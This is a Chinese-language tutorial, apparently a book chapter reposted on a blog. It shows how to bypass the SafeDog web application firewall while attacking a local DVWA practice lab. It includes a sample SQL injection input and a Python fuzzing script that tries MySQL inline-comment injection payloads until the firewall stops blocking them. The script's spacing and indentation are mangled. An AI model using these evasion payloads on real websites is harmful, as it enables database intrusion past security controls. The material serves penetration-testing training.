绕过安全狗

 

本节我们想要绕过的安全狗版本为v4.023957 ,它是网站安全狗的Apache版。

首先搭建环境。渗透环境选用DVWA漏洞集成环境,下载地址

http://www.dvwa.co.uk/ 。DVWA是一款集成的渗透测试演练环境,当刚刚入门  并且找不到合适的靶机时,可以使用DVWA ,它的搭建非常简便。如图8-1所示为 DVWA的下载页面。

fe5fd2216ce2412690cc3f9d07e418b3.png

图8-1    下载DVWA

下载完的文件是一个个压缩包,因为DVWA是建立在PHP和MySQL上的Web 漏洞测试环境,所以还需要一个由PHP和MySQL组成的Web服务才能正常运作。

通过下载网站环境phpStudy程序完成搭建,下载地址为小皮面板(phpstudy) - 让天下没有难配的服务器环境!。 安装完成后访问127.0.0.1查看服务是否开启,如图8-2所示。

 

 

 

 

 

063a1f5718c34b15b7df0c2bd46dd95f.png

图8-2    访问页面

将DVWA的压缩包解压到phpStudy的www 目录下。首先重置一下phpStudy的 MySQL密码,如图8-3所示。

 

 

 

 

 

93923d988c73440bbc81dabe6c26cec3.png

图8-3    重置密码

这里将密码设置为root 。此时再找到DVWA目录下的配置文件,将

DVWA/config下的config.inc.php.dist修改为config.inc.php 。打开config.inc.php ,将 其中的数据库用户名和密码修改为正确的,如图8-4所示。

 

 

 

 

 

47aff254383b40df85f7b08680289c9f.png

图8-4    修改配置文件

修改后保存。进入127.0.0.1/dvwa 目录便可正常显示登录界面。DVWA的默认 账户密码为admin/password。

接下来切换一下漏洞环境的难度。进入DVWA Security选项页面,将 Impossible换成Low ,点击Submit按钮,如图8-5所示。

 

 

 

 

 

df92f2a309734f76b093aa7a2170b28c.png

图8-5    设置等级

最后安装安全狗,可从官网(网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改)下 载。选择Windows操作系统,Apache版4.0版本,按默认选项安装即可。

安装完成后,首先尝试一下没有开启安全狗时的正常注入返回。选择SQL

Injection为SQL注入环境。在User ID框内输入1会正常返回数据,但输 入“ 1’and‘ 1’” 时会返回SQL错误语句。如下所示:

4460cc10cf69499fbc6565a038658be8.png

会出现这个错误是因为1后面的单引号被注入了本身正常的SQL查询语句中, 导致SQL查询语句出现错误,并返回到页面中。这表示此处可能存在SQL注入   点。在开启安全狗防护后执行一些SQL语句,便有不一样的返回,如图8-6所示。

 

 

 

 

 

这说明SQL注入语句已被安全狗检测出并且拦截掉了。下面我们就来编写一 个简单的模糊测试绕安全狗脚本。

b548eedd7aba46f3843a03d35e97638c.png

图8-6    安全狗拦截

首先抓取返回时安全狗页面的数据包和发送的数据,如果模糊测试发送数据 后返回的不是安全狗的页面,则表明已经绕过了安全狗,如图8-7所示。

f18097653b5a47dab9b9e4222187c8f5.png

图8-7    抓包

依据抓包信息编写如下脚本,发送一个请求包,其中含有抓取到的cookie,

因为这个页面是通过get传参的,所以模糊测试只需构造到URL中的参数进行测试 即可。通过模糊测试后,判断返回的页面是否为安全狗拦截显示的页面,使用页 面中返回的“攻击请求”进行判断,不存在这4个字,则表示已经绕过了安全狗:

55e574016e074f6fb9000cf431addc1e.png

import requests

#设置cookie

cookies = "security=low; PHPSESSID=6arlml0daogk8s5p23qgm2bvb4"

 

 

 

 

 

#设置协议头

headers = {

"User-Agent" : "Mozilla/5 .0 (Macintosh; Intel Mac OS X 10_13_2)

AppleWebKit/537 .36 (KHTML, like Gecko) Chrome/63 .0 .3239 .84

Safari/537 .36",

"Cookie" : "security=low; PHPSESSID=6arlml0daogk8s5p23qgm2bvb4"

}

#循环FUZZ

for i in range(10000,15000) :

reture = "http://10 .211 .55 .3/dvwa/vulnerabilities/sqli/?id=1%27%2F*

%21" + str(i) + "and*%2F+%27a%27%3D%27a+--%2B&Submit=Submit"

r = requests .get(reture, headers=headers) .text

key = "攻击请求"

ss = r .find(key)

if ss == -1 :

print("fuzz is ok!url is :")

print(reture)

模糊测试脚本运行出来的结果如下所示,这些链接都是已经能够绕过安全狗 的。

 

 

 

 

 

绕过安全狗的效果如图8-8所示。

1f3b30e788284a0bba517939dd01cdb0.png

图8-8    绕过安全狗

这里提示已经成功绕过安全狗,完成注入。

 

相关推荐

  1. 安全优化

    2024-02-08 17:16:01       31 阅读
  2. Windows 11的安装门槛

    2024-02-08 17:16:01       9 阅读
  3. MySQL 运算符

    2024-02-08 17:16:01       4 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-02-08 17:16:01       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-02-08 17:16:01       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-02-08 17:16:01       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-02-08 17:16:01       20 阅读

热门阅读

  1. 校园团餐SAAS系统源码

    2024-02-08 17:16:01       40 阅读
  2. linux centos安装LibreOffice

    2024-02-08 17:16:01       36 阅读
  3. 远程访问服务器Jupyter Notebook

    2024-02-08 17:16:01       40 阅读
  4. 如何用 npm 运行本地 js 文件

    2024-02-08 17:16:01       37 阅读
  5. Docker chapter 2

    2024-02-08 17:16:01       32 阅读
  6. IP地址详解

    2024-02-08 17:16:01       41 阅读
  7. Kubernetes命令备忘单

    2024-02-08 17:16:01       29 阅读